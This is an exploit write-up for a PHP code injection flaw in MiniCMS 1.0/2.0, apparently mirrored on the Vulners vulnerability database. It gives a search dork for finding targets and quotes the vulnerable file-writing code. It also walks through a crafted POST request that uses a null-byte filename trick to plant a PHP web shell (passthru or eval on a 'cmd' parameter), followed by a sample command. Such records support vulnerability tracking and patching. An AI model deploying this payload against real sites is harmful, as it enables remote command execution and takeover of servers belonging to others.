Vulners
Lucene search
MiniCMS 1.0/2.0 - PHP Code Injection
########################################################################
# Title : miniCMS v1.0 : v2.0 php inject code
# Author : Or4nG.M4n
# Version : all version
# GDork : "This site is managed using MiniCMS©"
# Download : http://sourceforge.net/projects/mini-cms/files/mini-cms/
# Thnks :
# +----------------------------------+
# | xSs m4n i-Hmx h311 c0d3 | sp. Cyb3r-Crystal
# | SarBoT511 ahwak2000 sa^Dev!L | sp. ahwak2000
# +----------------------------------+
# php code injection and bypass addslashes();
# vuln : update.php shell path /content
# vuln : updatenews.php shell path /content/news
$filename = "content/".$pagename.".txt"; <= .php%00
if ($file = fopen($filename, "w"))
{
//chmod($filename, 0777);
if($pagename == "sitemap"){
$eachline = split("\n", $postTemp["content"]);
$cleancontent = "";
foreach($eachline as $el){
if(trim($el) != ""){
$cleancontent .= trim($el) . "\n";
}
}
$postTemp["content"] = $cleancontent;
}
//$postTemp["content"] = str_replace('"', '\"', $postTemp["content"]);
if (!get_magic_quotes_gpc()) {
$postTemp["content"] = addslashes($postTemp["content"]);
}
fwrite($file, serialize($postTemp));
fclose($file);
}
else
{
echo "Unable to open file for writing, please check permissions on content directory";
}
}
else
{
$filename = "content/".$area.".txt"; < = .php%00
if ($file = fopen($filename, "w"))
{
chmod($filename, 0777);
//$postTemp["content"] = str_replace('"', '\"', $postTemp["content"]);
fwrite($file, $postTemp["content"]);
fclose($file);
}
How i can Use this Exploit
in your Browser FireFox
use add on LIVE HTTP HEADER
in target page [ http://localhost/miniCMS-2.0/index.php?page=1 ] ..
Replay to :
POST : http://www.cmtsystem.com/mCMS/update.php
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://localhost/miniCMS-2.0/index.php?page=1
Cookie: miniCMSdemo=32b5075aba3eb6c5d11129ec114346c2
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Post this shit : title=1&metadata=1&content=[CODE]&page=thnks-ahwak2000-cyber-crystal.php%00&area=content
Add Your code php here : [CODE]
Now how i can bypass addslashes(); inject <?php passthru($_GET[cmd]);?> or <?php eval($_GET[cmd]);?>
Don't Forget Referer : http://site/index.php?page=1
[ ! ] http://site/content/thnks-ahwak2000-cyber-crystal.php?cmd=uname-a
# Thnks to all Stupid Coder
# The End Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Jan 2012 00:00Current
7.4High risk
Vulners AI Score7.4